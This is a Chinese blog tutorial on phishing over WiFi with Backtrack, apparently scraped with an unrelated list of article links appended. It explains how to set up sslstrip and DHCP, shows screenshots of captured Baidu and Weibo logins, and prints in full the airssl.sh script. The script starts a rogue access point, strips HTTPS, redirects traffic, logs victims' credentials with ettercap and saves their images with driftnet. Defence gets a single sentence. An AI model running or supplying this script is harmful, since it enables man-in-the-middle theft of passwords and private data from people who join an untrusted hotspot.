Coisini、
Coisini、

利用Backtrack做Wifi钓鱼

利用Backtrack做Wifi钓鱼_第1张图片

本站曾介绍过几种无线钓鱼攻击手法,如《伪造AP简单思路(win7+linux)》及《无线Hacking之无线DOS与AP欺骗》。本次介绍的攻击手法是采用airssl.sh这个bash脚本,建立钓鱼热点。
原理:sslstrip+ettercap进行数据包的截获
0x01 配置
默认情况下,BT中的sslstrip和DHCP服务需要重新安装和设置
1.安装sslstrip
安装文件:

/pentest/web/sslstrip/setup.py

安装命令:

python setup.py install

2.DHCP的安装与配置:
①.安装 dhcp3 服务器:sudo apt-get install dhcp3-server
②.配置 dhcp3 服务,文件/etc/dhcp3/dhcpd.conf

subnet 192.168.1.0 netmask 255.255.255.0 { 
     range 192.168.1.2 192.168.1.100; 
     option domain-name-servers ns1.internal.example.org; 
     option domain-name "internal.example.org"; 
     option routers 192.168.1.1; 
     option broadcast-address 192.168.1.101; 
     default-lease-time 600; 
     max-lease-time 7200; 
   }

③.重新启动服务sudo /etc/init.d/dhcp3-server restart
④.更改 dhcp3 服务监听的网卡,可以修改

/etc/default/dhcp3-server 
    INTERFACES="eth1"

0x02 建立热点
为airssl.sh添加执行权限,执行(相关输入输入)
利用Backtrack做Wifi钓鱼_第2张图片
然后分别是AP建立、DHCP建立、sslstrip开启、ettercap开启,如图所示
利用Backtrack做Wifi钓鱼_第3张图片
0x03 测试
使用某android手机连接,
利用Backtrack做Wifi钓鱼_第4张图片
bash中会显示已经连接的设备:

利用Backtrack做Wifi钓鱼_第5张图片
测试百度帐号登录:
利用Backtrack做Wifi钓鱼_第6张图片
测试新浪微博登录:
利用Backtrack做Wifi钓鱼_第7张图片
0x04 防护
由于这种钓鱼攻击属于中间人攻击,较难被发现。谨慎使用未知的热点,尽量在可信的网络环境中登录帐号。

补充:airssl.sh代码如下

#!/bin/bash
# ©opyright 2009 - killadaninja - Modified G60Jon 2010
# airssl.sh - v1.0
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

# Network questions
echo
echo "AIRSSL 2.0 - Credits killadaninja & G60Jon  "
echo
route -n -A inet | grep UG
echo
echo
echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
read -e gatewayip
echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
read -e internet_interface
echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
read -e fakeap_interface
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"

# Dhcpd creation
mkdir -p "/pentest/wireless/airssl"
echo "authoritative;

default-lease-time 600;
max-lease-time 7200;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;

range 10.0.0.20 10.0.0.50;

}" > /pentest/wireless/airssl/dhcpd.conf

# Fake ap setup
echo "[+] Configuring FakeAP...."
echo
echo "Airbase-ng will run in its most basic mode, would you like to
configure any extra switches? "
echo
echo "Choose Y to see airbase-ng help and add switches. "
echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and slave will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
echo "Y, N or A "

read ANSWER

if [ $ANSWER = "y" ] ; then
airbase-ng --help
fi

if [ $ANSWER = "y" ] ; then
echo
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
redefined, also in this mode you MUST define a channel "
read -e aswitch
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

if [ $ANSWER = "a" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
sleep 2
fi

if [ $ANSWER = "n" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

# Tables
echo "[+] Configuring forwarding tables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

# DHCP
echo "[+] Setting up DHCP..."
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
sleep 3

# Sslstrip
echo "[+] Starting sslstrip..."
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2

# Ettercap
echo "[+] Configuring ettercap..."
echo
echo "Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N "
echo "Y or N "
read ETTER
if [ $ETTER = "y" ] ; then
ettercap --help
fi

if [ $ETTER = "y" ] ; then
echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
For the sake of airssl, ettercap WILL USE -u and -p so you are advised
NOT to use -M, also -i is already set and CANNOT be redifined here.
Ettercaps output will be saved to /pentest/wireless/airssl/passwords
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
echo
read "eswitch"
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
sleep 1
fi

if [ $ETTER = "n" ] ; then
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
sleep 1
fi

# Driftnet
echo
echo "[+] Driftnet?"
echo
echo "Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower), "
echo "Y or N "
read DRIFT

if [ $DRIFT = "y" ] ; then
mkdir -p "/pentest/wireless/airssl/driftnetdata"
echo "[+] Starting driftnet..."
driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
sleep 3
fi

xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo "[+] Activated..."
echo "Airssl is now running, after slave connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
echo
echo "[+] IMPORTANT..."
echo "After you have finished please close airssl and clean up properly by hitting Y,
if airssl is not closed properly ERRORS WILL OCCUR "
read WISH

# Clean up
if [ $WISH = "y" ] ; then
echo
echo "[+] Cleaning up airssl and resetting iptables..."

kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

echo "[+] Clean up successful..."
echo "[+] Thank you for using airssl, Good Bye..."
exit

fi
exit

注:新书《黑客社会工程学攻击2》中有涉及到这方面的技术内容哦,有兴趣的朋友可以买本看哦~ :)

你可能感兴趣的:(安全开发,无线安全,实战篇)

  • 鸿蒙HarmonyOS应用开发之使用Node-API接口进行线程安全开发 OpenHarmony_小贾 移动开发HarmonyOSOpenHarmonyharmonyos安全华为移动开发物联网APP
    场景介绍napi_create_threadsafe_function是Node-API接口之一,用于创建一个线程安全的JavaScript函数。主要用于在多个线程之间共享和调用,而不会出现竞争条件或死锁。例如以下场景:异步计算:如果需要进行耗时的计算或IO操作,可以创建一个线程安全的函数,将计算或IO操作放在另一个线程中执行,避免阻塞主线程,提高程序的响应速度。数据共享:如果多个线程需要访问同一
  • 2024年最全API成批分配漏洞介绍与解决方案_api 成批分配,聊聊网络安全开发的现状和思考 2401_84132544 程序员web安全网络安全
    本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有
  • AI大模型探索之路-实战篇9:探究Agent智能数据分析平台的架构与功能 寻道AI小兵 AI大模型Agent探索实践人工智能AIGC语言模型AI编程自然语言处理Agent数据分析
    系列篇章AI大模型探索之路-实战篇4:深入DB-GPT数据应用开发框架调研AI大模型探索之路-实战篇5:探索OpenInterpreter开放代码解释器调研AI大模型探索之路-实战篇6:掌握FunctionCalling的详细流程AI大模型探索之路-实战篇7:FunctionCalling技术实战自动生成函数AI大模型探索之路-实战篇8:多轮对话与FunctionCalling技术应用目录系列篇章
  • 2024年网络安全最全二蛋赠书二十期:《Python数据分析》,阿里架构师深入讲解网络安全开发 2401_84264583 程序员web安全python数据分析
    网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化资料的朋友,可以点击这里获取一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!总之,对于Python的学习和掌握为开发者提供了一个
  • 【大模型实战篇】大模型周边NLP技术回顾及预训练模型数据预处理过程解析(预告) 源泉的小广场 大模型自然语言处理人工智能大模型LLM预训练模型数据预处理高质量数据
    1.背景介绍进入到大模型时代,似乎宣告了与过去自然语言处理技术的结束,但其实这两者并不矛盾。大模型时代,原有的自然语言处理技术,依然可以在大模型的诸多场景中应用,特别是对数据的预处理阶段。本篇主要关注TextCNN、FastText和Word2Vec等低成本的自然语言处理技术,如何在大模型时代发挥其余热。今天先抛出这个主题预告,接下来会花些时间,逐步细化分析这些周边技术的算法原理、数学分析以及大模
  • ndk开发教程,Android-Binder机制及AIDL使用,实战篇 clhcowboy 程序员android
    开头1、一定要把基本的数据结构,经典的算法,Unix编程,程序编译链接及计算机原理等基础知识扎牢,这些会长远影响你的职业发展。2、推荐从C语言入门,不单是因为很多操作系统、网络协议栈开源代码由C/C++实现,更多是因为C语言自身的特性:作为高级语言用户无需关注底层细节,同时能直观的看到数据流向。而且C相对语法规则较为简单,可以短时间的上手应用。最重要的是,遵循C/C++、python的学习方式,比
  • 【实战篇】Mcu配置 李白LeeBai AUTOSAR学习笔记单片机嵌入式硬件mcu汽车学习笔记
    目录1前言2步骤2.1General配置2.2时钟源配置2.3新建时钟参考2.4配置时钟参考2.6结果展示3总结1前言本章我们开始配置Mcu模块,Mcu的配置项非常多,为最简化完成CAN的配置,我们需要按照【实战篇】新建EB工程的方法和步骤完成工程创建。本文中,我们将重点放在CAN的时钟配置上。时钟的配置,需要我们准备好芯片数据手册进行查询,这里以英飞凌TC397芯片为例,我们需要下载如下两份手册
  • 基于DDD的微服务设计和开发实战 九龙冰室083 设计模式微服务javamicroservices
    本文已在InfoQ发表。你是否还在为微服务应该拆多小而争论不休?到底如何才能设计出收放自如的微服务?怎样才能保证业务领域模型与代码模型的一致性?或许本文能帮你找到答案。本文是基于DDD的微服务设计和开发实战篇,通过借鉴领域驱动设计思想,指导微服务项目团队进行设计和开发(理论篇详见《当中台遇上DDD,我们该如何设计微服务》)。本文包括三部分内容:第一部分讲述领域驱动设计基本知识,包括:分层架构、服务
  • Java开发从入门到精通(七):Java的面向对象编程OOP:常用API HACKNOE Java开发从入门到精通javaintellij-idea
    Java大数据开发和安全开发(一)Java的常用API1.1Object类1.1toString1.1equals方法1.1对象克隆clone1.1Objects类1.1包装类1.1StringBuilder1.1StringBuffer1.1StringJoiner1.1Math、System、Runtime1.1BigDecimal1.1传统时间:Date日期类、SimpleDateForma
  • 读书——财务自由之路II 弥志伟
    沿着《小狗钱钱》的足迹,我找到了作者博多·舍费尔写给成人的理财书——《财务自由之路》(I,II,III),因为第二本是进阶实战篇,所以我选择先从第二本读起。作者先是告诉我们两个消息,好消息是:赚钱是一项游戏,你可以在不延长工作时间,也不提高工作强度的情况下,12个月内多赚20%,并且在三年内将总收入翻一番。但坏消息是,大部分人并不了解游戏规则。要想学习新的游戏规则,首先我们要看清我们思维中的老规则
  • 039-安全开发-JavaEE应用&SpringBoot框架&Actuator监控泄漏&Swagger自动化 wusuowei2986 安全java-eespringboot
    039-安全开发-JavaEE应用&SpringBoot框架&Actuator监控泄漏&Swagger自动化#知识点:1、JavaEE-SpringBoot-监控系统-Actuator2、JavaEE-SpringBoot-接口系统-Swagger3、JavaEE-SpringBoot-监控&接口&安全问题演示案例:➢SpringBoot-监控系统-Actuator➢SpringBoot-接口系统
  • 040-安全开发-JavaEE应用&SpringBoot框架&JWT身份鉴权&打包部署JAR&WAR wusuowei2986 安全java-eespringboot
    040-安全开发-JavaEE应用&SpringBoot框架&JWT身份鉴权&打包部署JAR&WAR#知识点:1、JavaEE-SpringBoot-身份鉴权-JWT技术2、JavaEE-SpringBoot-打包部署-JAR&WAR演示案例:➢SpringBoot-身份鉴权-JWT技术➢SpringBoot-打包部署-JAR&WAR#SpringBoot-身份鉴权-JWT技术JWT(JSONWe
  • 035-安全开发-JavaEE应用&原生反序列化&重写方法&链条分析&触发类&类加载 wusuowei2986 安全java-eepython
    035-安全开发-JavaEE应用&原生反序列化&重写方法&链条分析&触发类&类加载#知识点:1、JavaEE-反序列化-解释&使用&安全2、JavaEE-安全-利用链&直接重写方法3、JavaEE-安全-利用链&外部重写方法演示案例:➢Java-原生使用-序列化&反序列化➢Java-安全问题-重写方法&触发方法➢Java-安全问题-可控其他类重写方法#Java序列化&反序列化-概念1、序列化与反
  • 033-安全开发-JavaEE应用&SQL预编译&Filter过滤器&Listener监听器&访问控制 wusuowei2986 安全java-eesql
    033-安全开发-JavaEE应用&SQL预编译&Filter过滤器&Listener监听器&访问控制#知识点:1、JavaEE-JDBC-SQL预编译2、JavaEE-HTTP-Filter过滤器3、JavaEE-对象域-Listen监听器演示案例:➢JavaEE-预编译-SQL➢JavaEE-过滤器-Filter➢JavaEE-监听器-Listen#JavaEE-预编译-SQL原理:提前编译好
  • 036-安全开发-JavaEE应用&第三方组件&Log4j日志&FastJson序列化&JNDI注入 wusuowei2986 安全java-eelog4j
    036-安全开发-JavaEE应用&第三方组件&Log4j日志&FastJson序列化&JNDI注入#知识点:1、JavaEE-组件安全-Log4j2、JavaEE-组件安全-Fastjson3、JavaEE-基本了解-JNDI-API演示案例:➢Java-三方组件-Log4J&JNDI➢Java-三方组件-FastJson&反射#Java-项目管理工具-配置Jar仓库:https://mvnre
  • Pandas数据库大揭秘:read_sql、to_sql 参数详解与实战篇【第81篇—Pandas数据库】 一见已难忘的申公豹 数据库pandassqlpython数据存储数据科学
    Pandas数据库大揭秘:read_sql、to_sql参数详解与实战篇Pandas是Python中一流的数据处理库,而数据库则是数据存储和管理的核心。将两者结合使用,可以方便地实现数据的导入、导出和分析。本文将深入探讨Pandas中用于与数据库交互的两个关键方法:read_sql和to_sql。通过详细解析这两个方法的参数,我们将为读写数据库提供清晰的指导,并附带实际代码演示,以帮助读者更好地理
  • STM32玩转物联网实战篇:3.1.ESP8266 WIFI模块WEBClient通信示例详解GET、POST(心知天气、Onenet) AIoT-韶华分明 STM32玩转物联网实战篇stm32单片机嵌入式物联网网络通信
    1、准备开发板开发板功能区分布图开发板俯视图2、HTTP协议介绍HTTP协议简介    HTTP(HyperTextTransferProtocol)协议,即超文本传输协议,是一种用于分布式、协作式和超媒体信息系统的应用层协议。HTTP协议是基于TCP/IP协议的网络应用层协议。    HTTP是一个客户端终端(用户)和服务器端(网站)请求和应答的标准(TCP)。通过使用网页浏览器、网络爬虫或者其
  • Jmeter接口测试实战篇:10分钟学会Jmeter的用法 .咖啡加剁椒. 软件测试jmeter软件测试自动化测试功能测试程序人生职场和发展
    一提到接口测试,通常大家会有这样的疑问:前端测试不是已经覆盖到各种业务逻辑了吗?为什么还要做接口测试,接口测试和前端测试是不是重复了?对于这个问题,可以从下面几个方面来解释:什么是接口测试?接口测试是测试系统组件间接口的一种测试。接口测试主要用于检测外部系统与系统之间以及内部各个子系统之间的交互点。测试的重点是要检查数据的交换,传递和控制管理过程,以及系统间的相互逻辑依赖关系等。为什么要做接口测试
  • 理财小白实战篇【1】 20.2.21 ChenZi1892
    2020定个小目标先挣个2W[本金5000]看了很多博主的文章说养成理财的习惯就能使得财富,而我觉得理财是一门很大的学问,需要终身学习和总结实战首先提醒一下各位理财是使得自己的富余财富增长的过程,要有只要是投资就有风险的意识。最佳的理财形势是留足日常所需的现金。最好不要贷款投资,这样会让你压力增大,投资判断失误,影响生活质量。小编将关注并从事基金,黄金,股票,虚拟币的投资,希望和大家一起学习,共同
  • 每日安全资讯(2018.7.20) 溪边的墓志铭
    我们在安全开发的哪个位置?BSIMM来告诉你在企业向安全软件开发周期转型的过程中,不仅仅需要指导性的模型来确保自己的目标,也需要BSIMM这样的描述性模型去确认自己在安全中的方位以及自己前进的方向是否正确。https://www.secrss.com/articles/4031Gartner:对待中国《网络安全法》的四个步骤Gartner预测,到2021年,80%在中国运营的企业机构将会与咨询公司
  • 软件安全开发 星环之光 网络安全软件工程
    本文已收录至《全国计算机等级考试——信息安全技术》专栏1.1软件安全开发背景1.1.1软件的发展和安全问题软件是指计算机程序、方法和相关的文档资料,以及在计算机上运行时所需要的数据。软件安全问题有以下几个方面:(1)系统软件安全问题(2)应用软件安全问题(3)第三方代码安全(4)新技术安全问题软件的安全问题一般包含两个方面:一是软件的可靠性和可用性问题;二是软件中信息的保密性和完整性问题。1.1.
  • 2019-10-21 丛培国
    图片发自App【精进打卡第646天】【知~学习】《六项精进》0遍共61遍《大学》0遍共60遍【今年计划读十五本书】一、《正念领导力》OK二、《马云内部讲话》102三、《毛泽东》罗斯·特里尔OK四、《卓越企业的经营手法》OK五、《公司开了,你该这样管理》OK六、《我的第一本思维导图》015七、《阿米巴经营.实战篇》OK八、《稻盛哲学与阳明心学》OK九、《成功的真谛》OK十、《老板财务管控必修课》OK
  • 2020-12-22 阿戴儿_f4c0
    游戏力养育实战篇一‌早上起床的时候现在天气比较冷,我们怎么叫孩子起床的呢?孩子在被窝里磨蹭不肯起床,你是否总喊:快点儿快点儿,要迟到啦,来不及啦,但是你发现躺着还是一动不动,而且你越喊他越磨蹭。然后父母就更着急了,开始吼起来,结果呢?可想而知,孩子不高兴不配合我们自己心情也不好了!‌我们试着换种方法,宝宝,听说你自己会穿衣服裤子和袜子了,对吧!那我想知道你穿完一整套,需要多少时间!妈妈给你计时,好
  • 重要的事情,虽然不着急,也要马上处理。否则随时都会变成重要紧急的事情,而且会比当初更加的棘手 丛培国
    姓名:丛培国机构:丛迪服装公司【日精进打卡第253天】【知~学习】《六项精进》0遍共61遍《大学》0遍共60遍今年计划十五本一、《活法》OK二、《OKR工作法》二遍OK三、《创造高收益.贰》OK四、《思维导图.记忆力与专注力训练》OK五、《经营三十四问》P100六、《经营十二条》OK七、《调动员工积极性的七个关键》OK八、《经营与会计》OK九、《心法》二遍29十、《阿米巴经营.实战篇》015十一、
  • 深度学习实战篇之 ( 十八) -- Pytorch之SeNet fengyuxie 深度学习pytorch人工智能python机器学习
    科普知识注意力机制(AttentionMechanism)源于对人类视觉的研究。在认知科学中,由于信息处理的瓶颈,人类会选择性地关注所有信息的一部分,同时忽略其他可见的信息。上述机制通常被称为注意力机制。人类视网膜不同的部位具有不同程度的信息处理能力,即敏锐度(Acuity),只有视网膜中央凹部位具有最强的敏锐度。为了合理利用有限的视觉信息处理资源,人类需要选择视觉区域中的特定部分,然后集中关注它
  • Python 散点图线性拟合_线性回归(实战) weixin_39929595 Python散点图线性拟合python线性回归统计检验p值线性回归系数的标准误
    前面介绍了线性回归的理论知识后,有些朋友建议我写一篇实战篇,这样可以方便理解。今天我们就来使用Python实现多元线性回归模型的落地。本次数据集如下链接:https://pan.baidu.com/s/16w8-snxnTKtU3boAJGN1Cgpan.baidu.com提取码:3udf各个变量解释为AT:温度V:压力AP:相对湿度RH:排气量PE:发电量(因变量)下面正式开始吧!1,导入包#导
  • Kubernetes系列之监控Metres-server实战篇 weixin_30843605 json5ggit
    本次系列使用的所需部署包版本都使用的目前最新的或最新稳定版,安装包地址请到公众号内回复【K8s实战】获取介绍从Kubernetes1.8开始,Kubernetes通过MetricsAPI获取资源使用指标,例如容器CPU和内存使用情况。这些度量指标可以由用户直接访问,例如通过使用kubectltop命令,或者使用集群中的控制器。MetricsAPI:通过MetricsAPI,您可以获得node或po
  • Java安全开发 文景大大
    一、数据校验数据校验一般分为两种思路:黑名单剔除或者替换某些危险的字符,但是这种方案是比较弱的校验,因为你永远想不到会有其它什么危险的字符不在黑名单之内;白名单限定只能输入合法的字符,安全性高,但是白名单可能会维护较多的内容;1.1SQL注入避免直接使用不可信的数据来拼接需要执行的SQL语句,这是为了防止原始的SQL被意外地篡改为与预期完全不同语句。通常有以下两种解决方法:使用参数化查询;参数化查
  • 2019-05-31 丛培国
    图片发自App姓名:丛培国机构:丛迪服装公司【日精进打卡第503天】【知~学习】《六项精进》0遍共61遍《大学》0遍共60遍【今年计划读十五本书】一、《正念领导力》OK二、《马云内部讲话》102三、《毛泽东》罗斯·特里尔OK四、《卓越企业的经营手法》OK五、《公司开了,你该这样管理》OK六、《我的第一本思维导图》015七、《阿米巴经营.实战篇》OK八、《稻盛哲学与阳明心学》OK九、《永不放弃—特朗
  • 打磨产品-润总线下课 杨荣鹏
    图片发自App今天参加了润总的线下大课,又见到润总。跟润总学习一年半了,从第一季度的《5分钟商学院基础篇》到第二季度的《5分钟商学院的实战篇》,还参加了两次线下大课。算下来也算是忠实粉丝了。很感谢润总带给我商业的世界。让我知道每个事情背后都有其商业原理。今天的线下课主要讲的是打磨产品。现在躺在床上,把印象最深刻的点跟大家分享下。第一、产品即是满足顾客的欲望。我们都知道产品是为了满足顾客的需求,其实
  • 关于旗正规则引擎下载页面需要弹窗保存到本地目录的问题 何必如此 jsp超链接文件下载窗口
    生成下载页面是需要选择“录入提交页面”,生成之后默认的下载页面<a>标签超链接为:<a href="<%=root_stimage%>stimage/image.jsp?filename=<%=strfile234%>&attachname=<%=java.net.URLEncoder.encode(file234filesourc
  • 【Spark九十八】Standalone Cluster Mode下的资源调度源代码分析 bit1129 cluster
    在分析源代码之前,首先对Standalone Cluster Mode的资源调度有一个基本的认识: 首先,运行一个Application需要Driver进程和一组Executor进程。在Standalone Cluster Mode下,Driver和Executor都是在Master的监护下给Worker发消息创建(Driver进程和Executor进程都需要分配内存和CPU,这就需要Maste
  • linux上独立安装部署spark daizj linux安装spark1.4部署
    下面讲一下linux上安装spark,以 Standalone Mode 安装   1)首先安装JDK   下载JDK:jdk-7u79-linux-x64.tar.gz  ,版本是1.7以上都行,解压 tar -zxvf jdk-7u79-linux-x64.tar.gz     然后配置 ~/.bashrc&nb
  • Java 字节码之解析一 周凡杨 java字节码javap
        一: Java 字节代码的组织形式   类文件 {     OxCAFEBABE ,小版本号,大版本号,常量池大小,常量池数组,访问控制标记,当前类信息,父类信息,实现的接口个数,实现的接口信息数组,域个数,域信息数组,方法个数,方法信息数组,属性个数,属性信息数组 } &nbs
  • java各种小工具代码 g21121 java
    1.数组转换成List import java.util.Arrays; Arrays.asList(Object[] obj); 2.判断一个String型是否有值 import org.springframework.util.StringUtils; if (StringUtils.hasText(str)) 3.判断一个List是否有值 import org.spring
  • 加快FineReport报表设计的几个心得体会 老A不折腾 finereport
    一、从远程服务器大批量取数进行表样设计时,最好按“列顺序”取一个“空的SQL语句”,这样可提高设计速度。否则每次设计时模板均要从远程读取数据,速度相当慢!! 二、找一个富文本编辑软件(如NOTEPAD+)编辑SQL语句,这样会很好地检查语法。有时候带参数较多检查语法复杂时,结合FineReport中生成的日志,再找一个第三方数据库访问软件(如PL/SQL)进行数据检索,可以很快定位语法错误。
  • mysql linux启动与停止 墙头上一根草
    如何启动/停止/重启MySQL一、启动方式1、使用 service 启动:service mysqld start2、使用 mysqld 脚本启动:/etc/inint.d/mysqld start3、使用 safe_mysqld 启动:safe_mysqld&二、停止1、使用 service 启动:service mysqld stop2、使用 mysqld 脚本启动:/etc/inin
  • Spring中事务管理浅谈 aijuans spring事务管理
    Spring中事务管理浅谈 By Tony Jiang@2012-1-20 Spring中对事务的声明式管理 拿一个XML举例 [html]  view plain copy print ? <?xml version="1.0" encoding="UTF-8"?>&nb
  • php中隐形字符65279(utf-8的BOM头)问题 alxw4616
    php中隐形字符65279(utf-8的BOM头)问题 今天遇到一个问题. php输出JSON 前端在解析时发生问题:parsererror.   调试: 1.仔细对比字符串发现字符串拼写正确.怀疑是 非打印字符的问题. 2.逐一将字符串还原为unicode编码. 发现在字符串头的位置出现了一个 65279的非打印字符.        
  • 调用对象是否需要传递对象(初学者一定要注意这个问题) 百合不是茶 对象的传递与调用技巧
        类和对象的简单的复习,在做项目的过程中有时候不知道怎样来调用类创建的对象,简单的几个类可以看清楚,一般在项目中创建十几个类往往就不知道怎么来看   为了以后能够看清楚,现在来回顾一下类和对象的创建,对象的调用和传递(前面写过一篇)   类和对象的基础概念:   JAVA中万事万物都是类 类有字段(属性),方法,嵌套类和嵌套接
  • JDK1.5 AtomicLong实例 bijian1013 javathreadjava多线程AtomicLong
    JDK1.5 AtomicLong实例 类 AtomicLong 可以用原子方式更新的 long 值。有关原子变量属性的描述,请参阅 java.util.concurrent.atomic 包规范。AtomicLong 可用在应用程序中(如以原子方式增加的序列号),并且不能用于替换 Long。但是,此类确实扩展了 Number,允许那些处理基于数字类的工具和实用工具进行统一访问。  
  • 自定义的RPC的Java实现 bijian1013 javarpc
            网上看到纯java实现的RPC,很不错。         RPC的全名Remote Process Call,即远程过程调用。使用RPC,可以像使用本地的程序一样使用远程服务器上的程序。下面是一个简单的RPC 调用实例,从中可以看到RPC如何
  • 【RPC框架Hessian一】Hessian RPC Hello World bit1129 Hello world
    什么是Hessian The Hessian binary web service protocol makes web services usable without requiring a large framework, and without learning yet another alphabet soup of protocols. Because it is a binary p
  • 【Spark九十五】Spark Shell操作Spark SQL bit1129 shell
    在Spark Shell上,通过创建HiveContext可以直接进行Hive操作   1. 操作Hive中已存在的表   [hadoop@hadoop bin]$ ./spark-shell Spark assembly has been built with Hive, including Datanucleus jars on classpath Welcom
  • F5 往header加入客户端的ip ronin47
    when HTTP_RESPONSE {if {[HTTP::is_redirect]}{         HTTP::header replace Location [string map {:port/ /} [HTTP::header value Location]]HTTP::header replace Lo
  • java-61-在数组中,数字减去它右边(注意是右边)的数字得到一个数对之差. 求所有数对之差的最大值。例如在数组{2, 4, 1, 16, 7, 5, bylijinnan java
    思路来自: http://zhedahht.blog.163.com/blog/static/2541117420116135376632/ 写了个java版的 public class GreatestLeftRightDiff { /** * Q61.在数组中,数字减去它右边(注意是右边)的数字得到一个数对之差。 * 求所有数对之差的最大值。例如在数组
  • mongoDB 索引 开窍的石头 mongoDB索引
    在这一节中我们讲讲在mongo中如何创建索引       得到当前查询的索引信息      db.user.find(_id:12).explain();        cursor: basicCoursor 指的是没有索引  &
  • [硬件和系统]迎峰度夏 comsci 系统
      从这几天的气温来看,今年夏天的高温天气可能会维持在一个比较长的时间内    所以,从现在开始准备渡过炎热的夏天。。。。    每间房屋要有一个落地电风扇,一个空调(空调的功率和房间的面积有密切的关系)    坐的,躺的地方要有凉垫,床上要有凉席       电脑的机箱
  • 基于ThinkPHP开发的公司官网 cuiyadll 行业系统
    后端基于ThinkPHP,前端基于jQuery和BootstrapCo.MZ 企业系统 轻量级企业网站管理系统 运行环境:PHP5.3+, MySQL5.0 系统预览 系统下载:http://www.tecmz.com 预览地址:http://co.tecmz.com 各种设备自适应 响应式的网站设计能够对用户产生友好度,并且对于
  • Transaction and redelivery in JMS (JMS的事务和失败消息重发机制) darrenzhu jms事务承认MQacknowledge
    JMS Message Delivery Reliability and Acknowledgement Patterns http://wso2.com/library/articles/2013/01/jms-message-delivery-reliability-acknowledgement-patterns/ Transaction and redelivery in
  • Centos添加硬盘完全教程 dcj3sjt126com linuxcentoshardware
    Linux的硬盘识别: sda        表示第1块SCSI硬盘 hda       表示第1块IDE硬盘 scd0      表示第1个USB光驱 一般使用“fdisk -l”命
  • yii2 restful web服务路由 dcj3sjt126com PHPyii2
    路由 随着资源和控制器类准备,您可以使用URL如 http://localhost/index.php?r=user/create访问资源,类似于你可以用正常的Web应用程序做法。 在实践中,你通常要用美观的URL并采取有优势的HTTP动词。 例如,请求POST /users意味着访问user/create动作。 这可以很容易地通过配置urlManager应用程序组件来完成 如下所示
